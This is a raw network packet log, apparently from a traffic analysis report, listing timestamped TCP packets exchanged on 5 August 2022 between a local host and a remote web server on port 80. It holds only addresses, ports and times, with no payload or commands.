Aug 5, 2022 13:54:18.930258036 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930263996 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930280924 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930284977 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930300951 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930322886 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930325031 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930346966 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930363894 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930366993 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930389881 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930408001 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930408955 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930430889 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930444956 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930450916 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930463076 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930470943 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930490017 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930494070 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930510044 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930529118 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930530071 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930547953 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930562973 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930568933 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930588007 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930603027 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930608034 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930619955 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930628061 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930646896 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930659056 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930670977 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930682898 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930690050 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930711985 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930723906 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930732012 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930742979 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930752993 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930772066 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930785894 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930804014 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930821896 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930830956 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930840969 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930860996 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930861950 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930881977 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930901051 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930901051 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930922031 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930926085 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930939913 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930958033 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930959940 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930978060 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.930994987 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.930999041 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.931015015 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.931020975 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.931040049 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.931051016 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.931060076 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.931081057 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.931091070 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.931102991 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.931121111 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.931130886 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.931139946 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.931159019 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.931160927 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.931176901 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.931195974 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.931214094 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.931219101 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.931226969 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.931231976 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.931250095 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.931257010 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.931267977 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.931286097 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.931289911 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.931303978 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.931315899 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.931323051 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.931343079 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.931354046 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.931394100 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.931412935 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.958980083 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959029913 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959060907 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959065914 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.959090948 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959093094 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.959096909 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.959121943 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959126949 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.959150076 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959161043 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.959181070 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959186077 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.959214926 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.959219933 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959244013 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959256887 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.959266901 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959281921 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.959289074 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959302902 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.959311008 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959327936 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.959333897 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959346056 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.959377050 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959378958 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.959405899 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959428072 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959436893 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.959450960 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959472895 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959480047 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.959496975 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959497929 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.959521055 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959533930 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.959543943 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959563017 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.959567070 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959589005 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959597111 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.959611893 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.959615946 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.959630966 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.959660053 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.960366011 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.960397959 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.960427046 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.960438967 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.960458994 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.960464001 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.960480928 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.960490942 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.960520983 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.960532904 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.960550070 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.960553885 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.960563898 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.960582972 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.960609913 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.960618973 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.960644960 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.960649014 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.960659981 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.960680962 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.960704088 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.960731030 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.960735083 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.960767031 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.960767031 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.960798979 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.960798979 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.960818052 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.960829973 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.960858107 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.960864067 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.960887909 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.960889101 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.960906982 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.960918903 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.960926056 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.960948944 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.960954905 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.960978985 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961004019 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961010933 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961035013 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961044073 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961072922 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961091042 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961096048 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961103916 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961127043 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961133957 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961149931 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961163998 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961179018 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961194038 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961210012 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961225033 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961242914 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961257935 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961272955 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961287022 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961317062 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961321115 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961338043 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961349010 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961378098 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961380959 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961390972 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961409092 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961426973 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961440086 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961462975 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961472034 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961504936 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961509943 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961517096 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961534977 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961549997 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961565971 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961596966 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961623907 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961638927 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961646080 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961649895 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961654902 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961675882 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961714029 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961743116 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961741924 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961780071 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961780071 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961791039 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961807966 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961823940 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961837053 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961850882 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961867094 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961879015 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961894989 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961921930 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961932898 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961946011 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961952925 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.961970091 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.961982012 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.962001085 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.962013960 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.962023973 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.962044001 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.962066889 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.962071896 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.962085009 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.962102890 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.962111950 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.962131023 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.962145090 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.962161064 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.962168932 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.962202072 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.962210894 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.962229967 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.962238073 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.962260008 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.962266922 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.962290049 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.962300062 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.962317944 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.962330103 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.962347031 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.962357044 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.962376118 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.962384939 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.962405920 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.962414026 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.962435007 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.962445021 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.962461948 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.962476015 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.962491989 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.962500095 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.962521076 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.962531090 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.962548018 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.962560892 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.962589979 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.988873959 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.988934994 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.988970995 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.988987923 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989006042 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.989031076 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989047050 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.989056110 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989084005 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.989110947 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989140034 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.989154100 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989177942 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.989190102 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989213943 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.989223957 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989249945 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.989262104 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989284992 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.989295959 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989320993 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.989341021 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989372969 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.989404917 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989412069 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.989418030 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989454031 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.989454985 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989494085 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.989495039 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989536047 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.989538908 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989577055 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.989579916 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989618063 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.989620924 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989659071 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.989661932 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989701033 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.989701986 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989739895 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.989741087 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989782095 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.989783049 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989824057 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.989825964 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.989866972 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.991650105 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.991674900 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.991723061 CEST	80	49778	51.195.166.178	192.168.2.4
Aug 5, 2022 13:54:18.991734028 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.991756916 CEST	49778	80	192.168.2.4	51.195.166.178
Aug 5, 2022 13:54:18.991767883 CEST	80	49778	51.195.166.178	192.168.2.4
